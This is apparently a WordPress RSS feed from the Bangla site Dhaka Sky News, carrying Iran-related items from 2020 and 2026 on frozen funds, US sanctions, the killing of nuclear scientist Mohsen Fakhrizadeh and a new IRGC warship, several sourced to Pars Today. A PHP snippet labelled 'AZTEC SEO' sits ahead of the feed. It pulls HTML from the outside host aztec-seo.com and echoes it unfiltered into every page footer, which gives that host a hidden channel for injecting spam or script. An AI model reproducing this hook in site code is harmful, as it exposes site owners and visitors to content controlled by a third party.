/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইরান – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Sat, 13 Jun 2026 03:41:59 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 জব্দ করা ইরানি ২৪ বিলিয়ন ডলার ছাড়তে রাজি ট্রাম্প https://www.dhakaskynews.com/international/2026/06/13/News_ID-7242/ https://www.dhakaskynews.com/international/2026/06/13/News_ID-7242/#respond Sat, 13 Jun 2026 03:41:59 +0000 https://www.dhakaskynews.com/?p=7242 ইরানের জব্দকৃত ২৪ বিলিয়ন ডলারের সম্পদ ছাড়তে রাজি হয়েছেন মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্প। শুক্রবার (১২ জুন) ইরানের এক জ্যেষ্ঠ কর্মকর্তার বরাতে এক প্রতিবেদনে এ তথ্য জানিয়েছে দেশটির আধা-সরকারি সংবাদ সংস্থা ফার্স।
এদিকে, শুক্রবার (১২ জুন) ইরানে অর্থ স্থানান্তরের অভিযোগসংক্রান্ত বিভিন্ন প্রতিবেদন প্রত্যাখ্যান করেছে সংযুক্ত আরব আমিরাত। এর মধ্যে ৩ বিলিয়ন ডলার ইরানে পাঠানোর অভিযোগও অন্তর্ভুক্ত ছিল।
আরব আমিরাতের পররাষ্ট্র মন্ত্রণালয় এক বিবৃতিতে জানায়, কিছু আন্তর্জাতিক গণমাধ্যমে প্রকাশিত প্রতিবেদনগুলো আমরা সম্পূর্ণভাবে প্রত্যাখ্যান করছি। সংযুক্ত আরব আমিরাত থেকে ইরানে অর্থ স্থানান্তরের যে অভিযোগ আনা হয়েছে বিশেষ করে ৩ বিলিয়ন মার্কিন ডলার সংক্রান্ত দাবি প্রত্যাখ্যান করছি।
আমিরাতের মন্ত্রণালয় অভিযোগগুলোকে সম্পূর্ণ মিথ্যা ও ভিত্তিহীন বলে আখ্যায়িত করে এবং জোর দিয়ে বলে, ইরানের কোনো জব্দ বা স্থগিত তহবিল ইউএইর মাধ্যমে মুক্ত করা, স্থানান্তর করা বা স্থানান্তরে সহায়তা করা হয়নি।
ফার্স-এর প্রতিবেদন মতে, ইরানের সর্বোচ্চ নেতার জ্যেষ্ঠ উপদেষ্টা মোহসেন রেজায়ি দক্ষিণ-পশ্চিমাঞ্চলীয় শহর দেজফুলে এক স্মরণসভায় বক্তব্য দেওয়ার সময় এ মন্তব্য করেন।
প্রতিবেদন অনুযায়ী, রেজায়ি বলেন, সাম্প্রতিক সংঘাত ইরানের আন্তর্জাতিক অবস্থানকে আরও শক্তিশালী করেছে। তার দাবি, দেশের প্রতিরোধ ও প্রতিরক্ষা সক্ষমতা এমন পর্যায়ে পৌঁছেছে যে এখন জুয়াড়ি ট্রাম্প তেহরানের সঙ্গে আলোচনায় বসতেও ভয় পাচ্ছেন।
তিনি আরও অভিযোগ করেন, মার্কিন নীতিনির্ধারণে ইসরাইলের প্রভাব ক্রমশ বেড়েছে এবং বিভিন্ন লবিং কার্যক্রমের কারণে যুক্তরাষ্ট্র কার্যত ‘জায়নিস্ট শাসনের উপনিবেশে’ পরিণত হয়েছে।
রেজায়ির এ মন্তব্যের আগে ইরানের পররাষ্ট্রমন্ত্রী আব্বাস আরাগচি শুক্রবার (১২ জুন) বলেন, যুক্তরাষ্ট্রের সঙ্গে প্রস্তাবিত সমঝোতা স্মারক স্বাক্ষরিত হলে ইরান-সংক্রান্ত সব সংঘাতের আনুষ্ঠানিক অবসান ঘটবে। এর মধ্যে লেবানন ফ্রন্টও অন্তর্ভুক্ত থাকবে। পাশাপাশি এটি নিষেধাজ্ঞা প্রত্যাহার নিয়ে আলোচনার পথও সুগম করবে।

]]>
https://www.dhakaskynews.com/international/2026/06/13/News_ID-7242/feed/ 0
বিদায় নেয়ার আগে ইরানের ওপর আবার নিষেধাজ্ঞা দিল ট্রাম্প প্রশাসন https://www.dhakaskynews.com/international/2020/12/04/News_ID-1245/ https://www.dhakaskynews.com/international/2020/12/04/News_ID-1245/#respond Fri, 04 Dec 2020 08:45:56 +0000 https://www.dhakaskynews.com/?p=1245 মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্পের ক্ষমতা ত্যাগের আগ মুহূর্তেও তেহরানের বিরুদ্ধে নিষেধাজ্ঞা দিয়ে যাচ্ছে ওয়াশিংটন। মার্কিন অর্থ মন্ত্রণালয় গতকাল (বৃহস্পতিবার) একটি ইরানি কোম্পানি ও তার পরিচালকের বিরুদ্ধে নিষেধাজ্ঞা আরোপ করেছে।

ইরানের প্রতিরক্ষা মন্ত্রণালয়ের উদ্ভাবনী গবেষণা বিষয়ক সংস্থা- সেপান্দের সঙ্গে সহযোগিতা করার দায়ে ‘শহীদ মেইসামি কমপ্লেক্স’ নামক কোম্পানি ও তার পরিচালক মেহরান বাবরির ওপর নিষেধাজ্ঞা আরোপ করা হয়েছে। এই কোম্পানি বেসামরিক কাজে রাসায়নিক কর্মসূচি নিয়ে তৎপরতা চালায়। গত শুক্রবার সেপান্দের প্রধান ও বিশিষ্ট পরমাণু বিজ্ঞানী মোহসেন ফাখরিজাদে সন্ত্রাসী হামলায় শাহাদাতবরণ করেন।

মার্কিন অর্থ মন্ত্রণালয় এক বিবৃতিতে দাবি করেছে, সেপান্দের সঙ্গে শহীদ মেইসামি কমপ্লেক্স যৌথভাবে যে রাসায়নিক কর্মসূচি চালিয়ে যাচ্ছে তার মাধ্যমে রাসায়নিক অস্ত্র তৈরি করা সম্ভব। অর্থমন্ত্রী স্টিভেন মানুচিন বলেছেন, “ইরানের রাসায়নিক অস্ত্র তৈরির যেকোনো প্রচেষ্টার বিরোধিতা করে যাবে আমেরিকা।”তিনি দাবি করেন, ইরান রাসায়নিক অস্ত্র তৈরি করতে পারলে সে তার প্রতিবেশী দেশগুলোর ওপর তা প্রয়োগ করবে।

মার্কিন অর্থমন্ত্রী এমন সময় এ দাবি করলেন যখন ১৯৮০’র দশকে ইরান তার প্রতিবেশী দেশের (ইরাকের) পক্ষ থেকে ব্যাপকভাবে রাসায়নিক হামলার শিকার হয়েছিল। ইরান বহুবার বলেছে, রাসায়নিক অস্ত্র তৈরি করার কোনো পরিকল্পনা তার নেই। সূত্র : পার্সটুডে

ঢাকা স্কাইনিউজ/এস এম দৌলত

]]>
https://www.dhakaskynews.com/international/2020/12/04/News_ID-1245/feed/ 0
বিজ্ঞানী হত্যার অনেক ক্লু পাওয়া গেছে: গোয়েন্দা মন্ত্রী https://www.dhakaskynews.com/international/2020/12/01/News_ID-1213/ https://www.dhakaskynews.com/international/2020/12/01/News_ID-1213/#respond Tue, 01 Dec 2020 08:54:47 +0000 https://www.dhakaskynews.com/?p=1213 ইসলামি প্রজাতন্ত্র ইরানের গোয়েন্দা বিষয়ক মন্ত্রী মাহমুদ আলাভি বলেছেন, দেশের শীর্ষ পরমাণু বিজ্ঞানী মোহসেন ফাখরিজাদে হত্যাকাণ্ডের ঘটনায় এরইমধ্যে বহু রকমের ক্লু পাওয়া গেছে।

গত শুক্রবার রাজধানী তেহরানের কাছে ইরানের উপ-প্রতিরক্ষামন্ত্রী এবং দেশের শীর্ষ পরমাণু বিজ্ঞানী ফাখরিজাদেকে সন্ত্রাসীরা বোমা হামলা ও দূর নিয়ন্ত্রিত মেশিনগানের সাহায্যে গুলি চালিয়ে শহীদ করে।

এরইমধ্যে ইরানের সরকারি এবং সামরিক কর্মকর্তারা জোরালো ইঙ্গিত দিয়েছেন যে, ইহুদিবাদী ইসরাইল এই হত্যাকাণ্ডের পেছনে জড়িত রয়েছে। পাশাপাশি তারা হত্যাকাণ্ডের কঠিন প্রতিশোধ নেয়ার অঙ্গীকার ব্যক্ত করেন। আমেরিকার প্রভাবশালী পত্রিকা নিউইয়র্ক টাইমস তিনজন মার্কিন কর্মকর্তার বরাত দিয়ে এক প্রতিবেদনে জানিয়েছে, এই হত্যাকাণ্ডের সঙ্গে ইসরাইল জড়িত।

গতকাল রাজধানীতে শহীদ বিজ্ঞানী ফাখরিজাদের দাফন অনুষ্ঠানে দেয়া বক্তৃতায় ইরানের গোয়েন্দা মন্ত্রী আলাভি বলেন, হত্যাকাণ্ডের পরই ইরানের নিরাপত্তা বাহিনী সর্বোচ্চ প্রচেষ্টা শুরু করেছে এবং তারা এরইমধ্যে বিভিন্ন ধরনের ক্লু খুঁজে বের করতে সফল হয়েছে। এগুলো বিভিন্ন আঙ্গিক থেকে তদন্ত করে দেখা হচ্ছে।

গোয়েন্দা মন্ত্রী বলেন, এখনই এ সমস্ত সম্পর্কে বিস্তারিত বলা যাবে না কারণ বিষয়গুলো তদন্তের পর্যায়ে রয়েছে। তবে ইরানের জনগণকে সময়মতো অবশ্যই তদন্তের ফলাফল জানানো হবে। সূত্র : পার্সটুডে

ঢাকা স্কাইনিউজ/এস এম দৌলত

]]>
https://www.dhakaskynews.com/international/2020/12/01/News_ID-1213/feed/ 0
২০ বছর ধরে শত্রুরা ফাখরিজাদেকে হত্যার চেষ্টা করেছে : ইরান https://www.dhakaskynews.com/international/2020/12/01/News_ID-1204/ https://www.dhakaskynews.com/international/2020/12/01/News_ID-1204/#respond Tue, 01 Dec 2020 07:57:57 +0000 https://www.dhakaskynews.com/?p=1204 ইরানের সর্বোচ্চ জাতীয় নিরাপত্তা পরিষদের সচিব আলী শামখানি বলেছেন, তার দেশের গোয়েন্দা সংস্থাগুলো বিশিষ্ট পরমাণু বিজ্ঞানী মোহসেন ফাখরিজাদে’র ওপর সম্ভাব্য হামলা এবং এ রকম হামলার সম্ভাব্য স্থানগুলোর ব্যাপারে পূর্বাভাস দিয়েছিল।

গতকাল (সোমবার) রাজধানী তেহরানের অদূরে বিজ্ঞানী ফাখরিজাদে’র জানাযার নামাজে অংশ নেয়ার পর সাংবাদিকদের সঙ্গে আলাপকালে আলী শামখানি একথা বলেন। শত্রুরা গত ২০ বছর ধরে ইরানের এই বিজ্ঞানীকে হত্যা করার চেষ্টা করে এসেছে বলেও জানান তিনি।

আলী শামখানি বলেন, দুঃখজনকভাবে ফাখরিজাদের নিরাপত্তা ব্যবস্থায় শিথিলতা এসেছিল এবং শত্রুরা সেই সুযোগের সর্বোচ্চ সদ্ব্যবহার করেছে। তবে ফাখরিজাদে’র মতো বিজ্ঞানীর সংখ্যা ইরানে কম নয় বলেও জানান তিনি। একজন ফাখরিজাদে’কে হত্যা করলে শত শত ফাখরিজাদের জন্ম হবে।

ইরানে সর্বোচ্চ নিরাপত্তা কর্মকর্তা শামখানি বলেন, ইসলামি প্রজাতন্ত্র ইরানের শত্রুরা ফাখরিজাদে’দের শিখিয়ে যাওয়া জ্ঞান ও প্রযুক্তি এদেশের তরুণ বিজ্ঞানীদের কাছ থেকে ছিনিয়ে নিতে পারবে না।

ইরানের বিশিষ্ট পরমাণু বিজ্ঞানী এবং প্রতিরক্ষা মন্ত্রণালয়ের গবেষণা ও উদ্ভাবন বিষয়ক সংস্থার চেয়ারম্যান মোহসেন ফাখরিজাদে শুক্রবার সন্ধ্যায় এক সন্ত্রাসী হামলায় শহীদ হন। তেহরানের অদূরে দামাভান্দ কাউন্টির আবসার্দ শহরের একটি সড়কে সশস্ত্র সন্ত্রাসীরা ফাখরিজাদে’কে বহনকারী গাড়িতে হামলা চালায়। সূত্র : পার্সটুডে

ঢাকা স্কাইনিউজ/এস এম দৌলত

]]>
https://www.dhakaskynews.com/international/2020/12/01/News_ID-1204/feed/ 0
ইরানের নৌবাহিনীতে যুক্ত হলো বিশাল যুদ্ধ জাহাজ ‘শহীদ রুদাকি’ https://www.dhakaskynews.com/international/2020/11/20/News_ID-1170/ https://www.dhakaskynews.com/international/2020/11/20/News_ID-1170/#respond Thu, 19 Nov 2020 19:49:19 +0000 https://www.dhakaskynews.com/?p=1170 ইরানের ইসলামী বিপ্লবী গার্ড বাহিনী বা আইআরজিসি’র নৌ ইউনিটে আজ (বৃহস্পতিবার) যুক্ত হয়েছে নতুন যুদ্ধজাহাজ ‘শহীদ রুদাকি’।

ইরানের দক্ষিণাঞ্চলীয় বন্দর আব্বাসে বিশাল এই যুদ্ধজাহাজ সংযোজনের অনুষ্ঠানে উপস্থিত ছিলেন আইআরজিসি’র প্রধান মেজর জেনারেল হোসেইন সালামিসহ উচ্চপদস্থ কর্মকর্তারা।

বিশাল এই যুদ্ধজাহাজ বিভিন্ন ধরনের হেলিকপ্টার, ড্রোন, ক্ষেপণাস্ত্র, রাডার এবং আকাশ প্রতিরক্ষা ব্যবস্থা বহন করতে সক্ষম। এতে রয়েছে থ্রিডি রাডার,জাহাজ থেকে জাহাজে এবং আকাশে নিক্ষেপযোগ্য ক্ষেপণাস্ত্র। এছাড়া রয়েছে অত্যাধুনিক যোগাযোগ ব্যবস্থা।

এই যুদ্ধজাহাজ দূরবর্তী মহাসাগরে গিয়েও অভিযান চালাতে সক্ষম। বিশাল আকারের হওয়ার কারণে ইরানের এই জাহাজকে সাগরে ভাসমান শহর হিসেবেও অভিহিত করা হচ্ছে।

এই যুদ্ধ জাহাজ সাগরে ইরানসহ বিভিন্ন দেশের বাণিজ্যিক জাহাজকে নিরাপত্তা দেওয়ার পাশাপাশি মানবিক সহযোগিতা দেওয়ার কাজও করবে। ইরানের রয়েছে বিশাল পানিসীমা। এ কারণে দেশটি ইসলামি বিপ্লবের পর থেকেই সামরিক বাহিনীর অন্যান্য ইউনিটের পাশাপাশি নৌবাহিনীকে শক্তিশালী করার কাজে মনোনিবেশ করেছে। সূত্র : পার্সটুডে

]]>
https://www.dhakaskynews.com/international/2020/11/20/News_ID-1170/feed/ 0